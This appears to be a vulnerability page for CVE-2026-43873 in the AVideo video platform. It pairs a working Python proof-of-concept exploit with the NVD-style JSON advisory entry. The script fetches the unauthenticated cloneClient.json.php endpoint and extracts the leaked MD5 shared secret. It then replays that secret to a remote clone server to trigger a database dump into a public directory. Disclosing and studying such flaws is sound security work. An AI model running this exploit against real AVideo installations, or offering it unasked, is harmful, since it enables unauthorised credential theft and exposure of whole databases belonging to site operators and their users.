CVE-2026-43873

import requests import re # Target configuration target_url = "http://target-site.com/plugin/CloneSite/cloneClient.json.php" # 1. Exploit the information disclosure vulnerability print("[*] Attempting to leak the shared secret key...") try: response = requests.get(target_url) # 2. Analyze the response to extract the key # The description states the key is interpolated in the error message. # It is typically a 32-character MD5 hash. match = re.search(r'([a-fA-F0-9]{32})', response.text) if match: leaked_key = match.group(1) print(f"[+] Successfully leaked key: {leaked_key}") # 3. Demonstrate potential impact (Triggering remote dump) # Assuming the victim has a remote clone server configured remote_clone_url = "http://remote-server.com/plugin/CloneSite/cloneServer.json.php" print(f"[*] Attempting to authenticate to remote server using leaked key...") payload = { "myKey": leaked_key, "action": "sync" # Hypothetical action to trigger the dump } exploit_response = requests.post(remote_clone_url, data=payload) if exploit_response.status_code == 200: print("[+] Remote server accepted the request.") print("[!] Database dump likely initiated and saved to public directory.") else: print(f"[-] Remote server returned status: {exploit_response.status_code}") else: print("[-] Could not find key in response. Target might be patched.") print(response.text[:200]) # Debug output except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-43873", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.703", "lastModified": "2026-05-11T22:22:11.703", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone->myKey, a constant md5($global['systemRootPath'] . $global['salt'])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server's cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote's database to the remote's public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2", "source": "[email protected]"}]}}